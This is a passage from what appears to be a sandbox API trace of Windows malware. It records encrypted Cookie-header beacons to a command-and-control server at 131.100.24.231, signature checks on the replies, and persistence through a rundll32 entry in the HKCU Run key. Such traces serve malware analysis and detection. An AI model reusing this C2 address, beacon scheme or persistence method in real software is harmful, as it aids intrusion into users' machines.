muVFnpmWDtm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtpVhcYAgW6FDbOB4ynxfe4=\r\n") returned 258 [0328.735] GetProcessHeap () returned 0x530000 [0328.735] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f68 | out: hHeap=0x530000) returned 1 [0328.735] GetProcessHeap () returned 0x530000 [0328.736] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc570 | out: hHeap=0x530000) returned 1 [0328.736] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0328.737] GetProcessHeap () returned 0x530000 [0328.737] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0328.737] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0328.741] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="EbNOMLpVejdDyVULeZGbPrCFGbVbsTOPkiZZgYBbxeXXphaLsDMbQSSB", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0328.742] GetProcessHeap () returned 0x530000 [0328.742] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0328.742] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0328.742] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0328.743] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0328.743] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: muVFnpmWDtm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtpVhcYAgW6FDbOB4ynxfe4=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0329.971] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0329.971] GetProcessHeap () returned 0x530000 [0329.971] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0329.971] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x287) returned 1 [0329.972] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48087, dwNumberOfBytesToRead=0xfd79, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48087*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0329.972] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0329.972] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0329.972] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0329.972] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0329.972] GetProcessHeap () returned 0x530000 [0329.972] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0329.973] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0329.973] GetProcessHeap () returned 0x530000 [0329.973] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0329.973] GetProcessHeap () returned 0x530000 [0329.973] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0329.973] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0329.974] GetProcessHeap () returned 0x530000 [0329.974] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0329.974] GetProcessHeap () returned 0x530000 [0329.974] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0329.974] GetProcessHeap () returned 0x530000 [0329.975] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0329.975] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0329.975] GetProcessHeap () returned 0x530000 [0329.975] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0329.975] GetProcessHeap () returned 0x530000 [0329.975] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0329.975] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0329.975] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0329.975] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0329.975] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0329.975] GetProcessHeap () returned 0x530000 [0329.976] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0329.976] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0329.976] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0329.978] GetProcessHeap () returned 0x530000 [0329.978] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c640 [0329.978] GetProcessHeap () returned 0x530000 [0329.978] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0329.978] GetProcessHeap () returned 0x530000 [0329.979] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0329.979] GetProcessHeap () returned 0x530000 [0329.979] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a34c98 | out: hHeap=0x530000) returned 1 [0329.979] GetProcessHeap () returned 0x530000 [0329.980] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0329.980] GetProcessHeap () returned 0x530000 [0329.980] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0329.980] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0329.980] GetProcessHeap () returned 0x530000 [0329.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0329.980] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wPhOoGbY") returned 98 [0329.980] GetProcessHeap () returned 0x530000 [0329.980] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0329.981] GetProcessHeap () returned 0x530000 [0329.981] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0329.981] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x660, lpdwDisposition=0x0) returned 0x0 [0329.982] GetProcessHeap () returned 0x530000 [0329.982] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0329.982] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wPhOoGbY") returned 98 [0329.982] RegSetValueExW (in: hKey=0x660, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wPhOoGbY", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wPhOoGbY") returned 0x0 [0329.983] RegCloseKey (hKey=0x660) returned 0x0 [0329.983] GetProcessHeap () returned 0x530000 [0329.984] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c640 | out: hHeap=0x530000) returned 1 [0329.984] GetProcessHeap () returned 0x530000 [0329.984] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0329.984] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xde4d2) returned 0x102 [0339.991] GetProcessHeap () returned 0x530000 [0339.991] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0339.991] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0339.991] GetProcessHeap () returned 0x530000 [0339.991] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0339.991] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0339.991] GetProcessHeap () returned 0x530000 [0339.991] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0339.991] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0339.991] GetProcessHeap () returned 0x530000 [0339.991] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0339.991] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0339.994] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0339.994] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0339.994] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0339.994] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0339.994] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0339.994] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0339.994] GetProcessHeap () returned 0x530000 [0339.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0339.994] GetProcessHeap () returned 0x530000 [0339.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0339.995] GetProcessHeap () returned 0x530000 [0339.995] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0339.995] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0339.995] GetProcessHeap () returned 0x530000 [0339.995] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0339.995] GetProcessHeap () returned 0x530000 [0339.996] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0339.996] GetProcessHeap () returned 0x530000 [0339.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0339.996] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0339.996] GetProcessHeap () returned 0x530000 [0339.996] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0339.996] GetProcessHeap () returned 0x530000 [0339.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0339.996] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0339.997] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0339.997] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0339.997] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0339.997] GetProcessHeap () returned 0x530000 [0339.997] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0339.997] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0339.997] GetProcessHeap () returned 0x530000 [0339.997] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0339.997] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0339.997] GetProcessHeap () returned 0x530000 [0339.997] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0339.997] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0339.997] GetProcessHeap () returned 0x530000 [0339.997] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe4) returned 0x5bed18 [0339.998] GetProcessHeap () returned 0x530000 [0339.998] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0339.998] GetProcessHeap () returned 0x530000 [0339.998] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0339.998] CryptBinaryToStringW (in: pbBinary=0x5bed18, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0339.998] GetProcessHeap () returned 0x530000 [0339.998] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x262) returned 0x2b65430 [0339.998] CryptBinaryToStringW (in: pbBinary=0x5bed18, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtieRUxcwbhYYvGQdgDWjHfUdGsgEPPggyz6S9rEM6tDnwwz5gnmOXQT8GdY5xv8/wO7tglmEzbzxj9O2cI0HRabdHfi", pcchString=0x2cf504) returned 1 [0339.998] GetProcessHeap () returned 0x530000 [0339.999] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0339.999] GetProcessHeap () returned 0x530000 [0339.999] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0339.999] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: mHlANjnSSkPESW=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtieRUxcwbhYYvGQdgDWjHfUdGsgEPPggyz6S9rEM6tDnwwz5gnmOXQT8GdY5xv8/wO7tglmEzbzxj9O2cI0HRabdHfi\r\n") returned 329 [0339.999] GetProcessHeap () returned 0x530000 [0339.999] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0339.999] GetProcessHeap () returned 0x530000 [0339.999] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0339.999] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0340.000] GetProcessHeap () returned 0x530000 [0340.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0340.000] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0340.002] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="zMyKgMZsAUAz", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0340.003] GetProcessHeap () returned 0x530000 [0340.003] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0340.003] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0340.003] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0340.003] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0340.003] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: mHlANjnSSkPESW=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtieRUxcwbhYYvGQdgDWjHfUdGsgEPPggyz6S9rEM6tDnwwz5gnmOXQT8GdY5xv8/wO7tglmEzbzxj9O2cI0HRabdHfi\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0341.109] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0341.109] GetProcessHeap () returned 0x530000 [0341.109] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0341.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x1be) returned 1 [0341.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47fbe, dwNumberOfBytesToRead=0xfe42, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47fbe*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0341.110] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0341.110] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0341.110] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0341.110] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0341.110] GetProcessHeap () returned 0x530000 [0341.110] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0341.110] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0341.110] GetProcessHeap () returned 0x530000 [0341.110] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71e8 [0341.110] GetProcessHeap () returned 0x530000 [0341.110] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0341.110] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0341.111] GetProcessHeap () returned 0x530000 [0341.111] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71e8 | out: hHeap=0x530000) returned 1 [0341.111] GetProcessHeap () returned 0x530000 [0341.111] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0341.111] GetProcessHeap () returned 0x530000 [0341.111] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0341.111] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0341.111] GetProcessHeap () returned 0x530000 [0341.112] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0341.112] GetProcessHeap () returned 0x530000 [0341.112] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0341.112] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0341.112] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0341.112] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0341.112] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0341.112] 